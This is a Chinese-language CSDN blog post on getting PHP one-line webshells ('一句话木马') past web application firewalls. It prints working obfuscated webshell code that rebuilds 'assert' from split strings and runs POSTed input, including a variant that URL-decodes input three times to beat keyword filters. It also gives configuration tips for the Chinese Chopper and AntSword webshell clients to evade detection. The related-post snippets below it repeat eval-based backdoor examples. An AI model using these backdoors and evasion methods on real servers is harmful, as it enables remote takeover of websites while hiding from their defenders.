论一句话过WAF

已于 2022-09-19 14:17:42 修改
阅读量1.8k 收藏 1
点赞数
文章标签: php 开发语言
于 2019-03-07 00:39:45 首次发布
仅供学习,未经许可不得擅自转载
本文链接:https://blog.csdn.net/weixin_42282667/article/details/88266917
版权

一.绕过方式

  • 木马存在敏感字符被拦截

木马代码存在敏感字符,直接被waf。如:如直接传<?php @@eval($_POST['123']); ?>,由于存在eval危险函数直接被拦截。

这时候需要对被waf的危险字符进行各种变形即可

收集的过狗马,最大同性交友网站github也有很多webshell项目

$poc = "a#s#s#e#r#t";

$poc_1 = explode("#", $poc);

$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];

$poc_2($_POST['super'])

  • Request请求体中存在敏感字符被拦截

最常见的就是对User-Agent和请求参数中进行检测。

如请求参数中存在敏感字符就会被拦,也会对特定标识的User-Agent头部进行拦截。如中国菜刀的User-Agent头部标识。

如对GET请求数据中的phpinfo()字符进行拦截

这时候我们需要对请求的参数进行编码,相对的在一句话代码中需要对传入的参数进行解密

如: 使用3次URL编码绕过

<?php

$poc ="axsxsxexrxt";

$poc_1 = explode("x", $poc);

$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];

$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));

?>

Phpinfo()进行三次url编码

二.原版菜刀的过waf配置

在Config.ini文件中对PHP_MAKE参数进行加密

如:   需要对传参进行三次URL编码

PHP_MAKE参数进行三次url加密和设置请求头即可

三.中国蚁剑AndSword过waf的配置

配置编码设置,这里我已PHP脚本作为例子

这里会有一个base64编码作为示范,只需要改动data[pwd]即可

三次URL编码,注意${randomID}不要做处理

在下方选中解密器,配置User-Agent

supdon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSP一句后门
10-31
JSP一句后门 JSP一句后门是指在Java Server Pages(JSP)中使用的一种后门技术,该技术允许攻击者在服务器上写入恶意文件,从而控制服务器的行为。 知识点1: JSP是什么? JSP全名为Java Server Pages,是一种...
php一句waf春秋,【过waf篇】一句木马如何优雅地过waf
weixin_32924669的博客
03-21 252
【过waf篇】一句木马如何优雅地过waf0x00WAF简介作者:雨幕 微信公众号:异空间安全Web应用防护系统(也称:网站应用级入侵防御系统。英文:WebApplicationFirewall,简称:WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。Waf拦截一句木马原理:以正则表达式匹配关键字判断是...
eval与assert执行一句木马
C_LCH_2000的博客
07-24 2239
eval函数中参数是字符,assert函数中参数为表达式 (或者为函数)
网络安全各类WAF绕过技巧
2401_84466325的博客
05-07 1951
当发送的内容太大,超过一个http包容量,需要分多次发送时,值会变成keep-alive,即本次发起的http请求所建立的tcp连接不断开,直到所发送内容结束Connection为close为止。HTTP头里的Content-Type一般有application/x-www-form-urlencoded,multipart/form-data,text/plain三种,其中multipart/form-data表示数据被编码为一条消息,页上的每个控件对应消息中的一个部分。编码过程中长度需包括空格的长度。
php一句木马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
一、什么是一句木马? 一句木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
php eval $ post,网站多了几个PHP文件,eval($_POST['1']);
weixin_39805883的博客
03-11 750
网站多了几个PHP,内容如下:eval($_POST['1']);有的是其他内容, 我百度了一下发现时执行某些命令的,我测试了一下 如果权限没限制好的 确实可以执行一些命令。 请问 除了设置权限,从代码级别可否做限制呢?有没有什么好办法呢?还有个PHP文件内容如下:还有文件,名字是:13686921256303.virus_killed内容是:请各位出出注意,谢谢了。回复内容:网站多了几个PHP...
php使用eval上传文件,PHP一句实现单个文件批量上传?
weixin_39555320的博客
03-09 659
0×00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句为例来分析一下如何实现这类需求。0×01 原理分析首先,我们必须了解菜刀是如何通过一句木马来实现web服务器的文件管理的。下面是最常见的php一句木马:当我...
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3826
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
一句木马要点和防范注意事项
最新发布
05-24
"一句木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
php一句cmdshell新型 (非一句木马)
10-30
【PHP 一句 CMDShell 新型(非一句木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句木马是直接执行 PHP ...
waf是如何被绕过的
12-30
介绍了白名单绕过、IP段白名单绕过、绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
PHP隐形一句后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
隐形一句后门是黑客植入Web应用中的隐蔽代码,通常用于远程控制和恶意活动。这种后门很难被检测到,因为它通常被编码和隐藏在正常代码中。 首先,我们看到一个名为`mm.php`的文件,其内容包含`($_POST[c]);?>`。...
php一句木马连菜刀,如何基于菜刀PHP一句实现单个文件批量上传?
weixin_35741494的博客
03-09 1902
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句木马来实现web服务器的文件管理的。下面是最常见...
BUUCTF-[极客大挑战 2019]Upload1
Monica的博客
09-14 1891
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
eval一句的简单理解
这周末在做梦的博客
05-06 950
对eval类型的一句的见解一,$_POST1概述2常见格式3使用方式二,$_GET1概述2常见格式3使用方法4举例一级目录二级目录三级目录 一,$_POST 1概述 POST是一种取数据的方式。请求开始后,浏览器要向服务器额外发送一些数据,例如cookie、用户名、密码等等,这些数据不体现在URL上,发送完毕后服务器再将数据(网页)传送给浏览器。 (下述为个人理解) 通过该方法传递,简单来说就是用传递的参数构建连接,一旦主动调用后,参数将传递至服务器,且服务器响应200,就建立了TCP/UDP连接,可以通
一句木马WAF绕过
CheAyuki13的博客
10-03 456
原理WAF通常会以关键字判断是否为一句木马,所以要将一句木马变形使用,从而绕过 waf:1.php变量函数<?php $a = "assert"; $a($_POST['-7']); ?>2.str_replace函数<?php $a = str_replace("b", "", "absbsbebrbt")...
记录一道文件上传题目
Altering_Ji的博客
05-08 268
CTF文件上传类题目,上传的文件中的内容也会被过滤,可以用双写和短标签绕过
一句木马构造与蚁剑连接
qq_52395989的博客
08-16 2041
1.上传文件含一句木马的shell.php,复制图片链接http://2095b394-7d95-4957-bd2e-1d3e5fe29b34.node4.buuoj.cn:81/upload/shell.php。2.准备一张图片和muma.php放在同一个文件夹中,cmd进入该文件夹。1.创建一个txt文档,把上述命令写入,保存为muma.php。2.打开蚁剑——>添加数据。3.最后点击添加就完成了。
一句木马绕WAF(小宇特详解)
小宇的web博客
04-08 2515
webshell绕过WAF 常见的PHP一句木马就是 <?php eval($_REQUEST['a'];)?> WAF的工作原理以正则匹配为主,这里尝试他到底是正则匹配了什么 这里首先尝试 <?php eval?> 发现没有拦截 然后尝试 <?php eval($_REQUEST[]);?> 发现拦截了,去掉中括号,发现不拦截了。 这里过滤了[] =>替换eval 替换$_REQUEST[a]=>超全局变量 这里利用了一个php函数end end函
sqlmap过waf
09-17
针对sqlmap过WAF的问题,有几种方法可以尝试绕过WAF的检测。可以使用salmap的随机agent头方法,清空sqlmap缓存,解决一些版本问题。此外,在sqlmap的目录中有一个tamper文件,其中包含了一些绕过脚本,可以使用这些脚本来丰富功能。还可以通过给sqlmap设置代理,抓取sqlmap注入语句的数据包进行分析。可以修改sqlmap的user-agent参数,模拟搜索引擎爬虫的user-agent,或者使用延迟参数来调整请求频率。此外,还可以使用burp抓包工具替换WAF检测的字段,或者将注入语句生成txt文件,放在sqlmap目录下跑多个语句来绕过WAF的检测。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值